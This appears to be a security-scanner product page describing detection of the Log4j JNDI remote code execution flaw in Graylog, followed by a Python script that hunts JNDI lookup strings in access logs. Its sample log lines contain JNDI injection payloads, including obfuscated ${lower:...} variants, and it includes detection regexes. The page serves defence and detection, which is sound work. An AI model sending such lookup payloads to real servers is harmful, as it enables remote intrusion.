
Graylog Remote Code Execution Scanner
Detects the Remote Code Execution (RCE) vulnerability in Graylog that stems from Apache Log4j2 versions 2.0-beta9 through 2.15.0.
Short Info
Level: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 17 days
Scan only one: Domain, Subdomain, IPv4
Graylog is an open-source log management platform used by IT operations and developers for monitoring, analyzing, and visualizing data. The software aggregates and searches through large amounts of log data from various sources, helping organizations to improve their system security and performance. Deployed across many enterprise environments, Graylog aids in real-time log collection, storage, and analysis, creating valuable insights into application and system behaviors. Its user-friendly interface and scalable architecture make it a popular choice among businesses needing a robust logging solution. The software is utilized across different sectors to enhance security protocols, audit compliance, and streamline troubleshooting processes. Moreover, Graylog's extendable framework allows for seamless integration with various external systems and services.
The Remote Code Execution (RCE) vulnerability detected in Graylog stems from the widely used Apache Log4j 2 library. The flaw allows attackers to execute arbitrary code through maliciously crafted log messages. It primarily affects Log4j versions prior to 2.15.0, except for the security releases 2.12.2, 2.12.3, and 2.3.1. Exploitation occurs when an attacker manipulates log message parameters so that they reference attacker-controlled endpoints over LDAP or other JNDI-supported protocols. This allows unauthorized users to inject and execute remote commands on the vulnerable server. The flaw is critical because any system that records or processes attacker-influenced input through a susceptible Log4j version can be exploited.
In technical terms, the vulnerability abuses the JNDI (Java Naming and Directory Interface) lookup feature that Log4j evaluates in configuration values, log messages, and parameters. Malicious lookup strings supplied as user input end up in the log data and are then resolved by the application. The scanner targets the API endpoint `/api/system/sessions`, sends request headers including `X-Requested-With`, and injects LDAP-based JNDI exploit strings through JSON payloads. These are designed to trigger DNS callbacks to the `interactsh-url` parameter, which indicate a successful code execution attempt. The scanner verifies these callbacks through strict match conditions, including specific header word checks and regex-based DNS log analysis.
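The paragraph above describes how the scanner plants JNDI lookup strings in request headers and JSON bodies. On the defending side, the same pattern can be hunted in web-server or Graylog access logs. The following is an added example (not the scanner's or Graylog's own code): it normalises the common Log4j lookup wrappers used to disguise a JNDI lookup (`${lower:x}`, `${upper:x}` and the default-value form `${anything:-x}`) and then flags lines that contain `${jndi:<scheme>`. The log lines, the IP addresses and the `example.invalid` hosts are constructed for the example; the log line layout is an assumption, not a Graylog format.

```python
import re
from typing import List, Optional

# Constructed sample access-log lines (not taken from the page). Lines 2 and 3
# carry a Log4j JNDI lookup; line 3 hides it behind ${lower:...} wrappers.
# Line 4 uses a harmless ${env:...} lookup and must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "POST /api/system/sessions HTTP/1.1" 401 "X-Requested-With: XMLHttpRequest" "Mozilla/5.0"',
    '10.0.0.9 - - "POST /api/system/sessions HTTP/1.1" 401 "X-Requested-With: ${jndi:ldap://example.invalid/a}" "curl/7.79"',
    '10.0.0.7 - - "GET /api/system HTTP/1.1" 200 "X-Requested-With: XMLHttpRequest" "${${lower:j}ndi:${lower:l}dap://example.invalid/b}"',
    '10.0.0.3 - - "GET /search?q=${env:HOME} HTTP/1.1" 200 "X-Requested-With: XMLHttpRequest" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} wrappers. Nested braces are excluded so that the
# innermost wrapper is resolved first and the outer one on a later round.
_CASE_WRAPPER = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Default-value form: ${name:-x} resolves to x when "name" is unknown; the
# degenerate ${::-x} form is matched as well.
_DEFAULT_WRAPPER = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# A JNDI lookup with one of the schemes the Log4j JNDI lookup can dispatch to.
_JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)\b", re.IGNORECASE)


def _resolve_case(m: "re.Match[str]") -> str:
    # Apply the case transform the wrapper asks for so the output matches what
    # Log4j would have produced.
    inner = m.group(2)
    return inner.lower() if m.group(1).lower() == "lower" else inner.upper()


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse obfuscating lookup wrappers until the text stops changing.

    max_rounds bounds the work on pathological input; each round only removes
    one nesting level, so ten rounds cover any realistic payload.
    """
    for _ in range(max_rounds):
        new = _CASE_WRAPPER.sub(_resolve_case, text)
        new = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for a line containing a JNDI lookup, else None."""
    normalized = normalize_lookups(line)
    m = _JNDI_LOOKUP.search(normalized)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),
        # The lookup was hidden behind wrappers if the plain form was absent
        # from the raw line and only appeared after normalisation.
        "obfuscated": m.group(0) not in line,
        "normalized": normalized,
    }


def scan_lines(lines: List[str]) -> List[dict]:
    """Scan a batch of log lines and report 1-based line numbers of hits."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        finding = scan_line(line)
        if finding:
            finding["line_no"] = line_no
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG_LINES):
        flag = "obfuscated" if hit["obfuscated"] else "plain"
        print(f'line {hit["line_no"]}: jndi:{hit["scheme"]} ({flag})')
```

Normalisation is the part that matters for detection quality: a rule that only greps for the literal `${jndi:` misses the wrapped variants, while resolving the wrappers first catches both forms with one pattern. The `obfuscated` flag is useful for triage, since a disguised lookup is a stronger signal of deliberate probing than a plain one that a scanner such as the one described here would send.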
If exploited, this vulnerability allows destructive actions ranging from data theft and unauthorized server access to malware deployment. Attackers could gain control of the Graylog server, leading to potential lateral movement within the network. Successful exploitation would compromise data integrity, confidentiality, and system availability, leaving organizations exposed to further sophisticated attacks. Besides the immediate impact, prolonged exposure may risk regulatory penalties due to breaches and non-compliance with privacy standards.